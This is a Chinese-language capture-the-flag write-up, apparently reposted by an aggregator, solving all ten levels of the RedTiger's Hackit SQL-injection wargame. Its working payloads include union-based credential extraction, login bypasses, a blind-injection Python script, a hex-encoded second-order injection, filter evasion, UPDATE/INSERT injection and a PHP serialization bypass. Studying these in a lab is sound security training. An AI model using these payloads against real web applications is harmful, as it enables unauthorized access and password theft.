Redtiger Hackit Writeup

Posted HelloWord

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Redtiger Hackit Writeup相关的知识,希望对你有一定的参考价值。

RedTiger‘s Hackit

 

Level 1

Welcome to level 1

Lets start with a simple injection.

Target: Get the login for the user Hornoxe
Hint: You really need one? omg -_-
Tablename: level1_users 

通过http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1 发现cat存在注入漏洞

用order by 得到字段数为4,然后用union select 1,2,3,4 查询得到3,4为回显列。

最终payload:

http://redtiger.labs.overthewire.org/level1.php?cat=100 union select 1,2,group_concat(username),group_concat(password) from level1_users

 

 

Level 2

Welcome to level 2

A simple loginbypass

Target: Login
Hint: Condition 

根据题目要求为登陆绕过

在username和password中插入单引号发现password存在注入点

最终payload:

username=123&password=123 or 1=1&login=Login

 

Level 3

Welcome to Level 3

Target: Get the password of the user Admin.
Hint: Try to get an error. Tablename: level3_users
看了别人的writeup才知道用数组显示错误信息

usr[]=MDYzMjIzMDA2MTU2MTQxMjU0

根据错误信息

 preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

下载urlcrypt.inc文件

<?php

    // warning! ugly code ahead :)
          
    function encrypt($str)
    {
        $cryptedstr = "";
        srand(3284724);
        for ($i =0; $i < strlen($str); $i++)
        {
            $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
            
            while(strlen($temp)<3)
            {
                $temp = "0".$temp;
            }
            $cryptedstr .= $temp. "";
        }
        return base64_encode($cryptedstr);
    }
  
    function decrypt ($str)
    {
        srand(3284724);
        if(preg_match(‘%^[a-zA-Z0-9/+]*={0,2}$%‘,$str))
        {
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
            {
                $decStr = "";
                
                for ($i=0; $i < strlen($str); $i+=3)
                {
                    $array[$i/3] = substr($str,$i,3);
                }

                foreach($array as $s)
                {
                    $a = $s ^ rand(0, 255);
                    $decStr .= chr($a);
                }
                
                return $decStr;
            }
            return false;
        }
        return false;
    }




    
?>

这是参数加密解密的算法

所以构造文明payload:

‘ union select 1,password,2,3,4,5,6 from level3_users where username=‘Admin

加密后为:

MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

 

Level 4

Welcome to Level 4


Target: Get the value of the first entry in table level4_secret in column keyword
Disabled: like

id存在注入点

根据Query returned 0 rows. 或Query return 1 rows.进行盲注

通过payload:

http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=(select length(keyword)=21 from level4_secret)

得到keyword 的长度为21

编写脚本:

 1 import requests
 2 import string
 3 import re
 4 
 5 keword=‘‘
 6 char=string.printable
 7 url=http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=(select ascii(substr((select keyword from level4_secret),{0},1))={1})
 8 cookie={level4login:there_is_no_bug}
 9 for i in range(1,22):
10     for c in char:
11         test=url.format(i,ord(c))
12         r=requests.get(test,cookies=cookie)
13         if re.findall(Query returned 1 rows.,r.text):
14             print i,c
15             keword+=c
16 print keword

得到keyword

 

Level 5

Welcome to Level 5

Target: Bypass the login
Disabled: substring , substr, ( , ), mid
Hints: its not a blind, the password is md5-crypted, watch the login errors

根据题目要求密码进行md5加密

猜想后端的sql语句为:

select username,password from table where username=‘.inputuser.‘

再将得到password 与md5 加密后的输入密码作比较

得到payload:

username=‘ union select 1,md5(1)#&password=1&login=Login

  

Level 6

Welcome to Level 6

Target: Get the first user in table level6_users with status 1

user存在注入点

通过 order by 发现字段数为5

通过user=0 union select 1,2,3,4,5 from level6_users where status=1,显示User not found

在个字段中尝试username 

http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,username,3,4,5 from level6_users where status=1

 

后面password放在哪里都没有信息,看了别人解答才知道原来是进行了2次sql查询

后台php代码可能为:

$sql="select username,password from level6_users where id=1";
$result=mysql_query($sql) or die(‘<pre>‘.mysql_error().‘</pre>‘);
$row=mysql_fetch_row($result);
$username=$row1[1];
$sql2="select username,email from level6_users where username="."‘".$username."‘"

所以payload为:

http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,‘ union select 1,2,3,password,5 from level6_users where status=1#
,3,4,5 from level6_users where status=1

根据返回信息 有字符可能被过滤,将payload改成16进制:

http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,0x2720756e696f6e2073656c65637420312c322c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123
,3,4,5 from level6_users where status=1

得到结果

 

Level 7

Welcome to Level 7

Target: Get the name of the user who posted the news about google. Table: level7_news column: autor
Restrictions: no comments, no substr, no substring, no ascii, no mid, no like

 

输入apple‘

根据报错信息:

SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE ‘%apple‘%‘ OR text.title LIKE ‘%apple‘%‘)

构造payload:(空格被过滤 可用%09 %0d %a0 代替)

search=apple%) union select 1,2,3,4 --%09&dosearch=search%21

最终payload:

search=1%) union select 1,2,3,autor from level7_news --%a0&dosearch=search%21

 

Level 8

Welcome to Level 8

Target: Get the password of the admin.

经过测试email 存在注入点

根据错误信息可以推测出后台的sql语句:

update table set name=inputname,mail=inputmail,icq=inputicq,age=inputage where id=1

mysql中的update的一个用法:A1=A2   A1,A2为同一表中字段则可将A2的值赋给A1

所以构造payload:

email=hans%40localhost,name=password,icq= &name=Hans&icq=12345&age=25&edit=Edit

 

Level 9

Welcome to Level 9

Target: Get username and password of any user. Tablename: level9_users
This is not a blind injection. There is a way to get some output back:) 

经过测试发现注入点为text

推测后台的sql语句为:

insert into table (autor,title,text) values (inputautor,inputtitle,inputtext)

构造payload:

autor=12&title=12&text=213),((select username from level9_users),(select password from level9_users),123&post=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 

Level 10

Welcome to Level 10

Target: Bypass the login. Login as TheMaster

 

POST 内容为:

login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login

解码后为:

a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

为序列化信息

修改序列化信息为:

a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}

 

以上是关于Redtiger Hackit Writeup的主要内容,如果未能解决你的问题,请参考以下文章

RedTiger‘s Hackit -- level 10

RedTiger‘s Hackit -- level 10

Redtiger SQL注入练习

Redtiger SQL注入练习

[Java代码审计]javacon WriteUp

Natas32 Writeup(Perl 远程代码执行)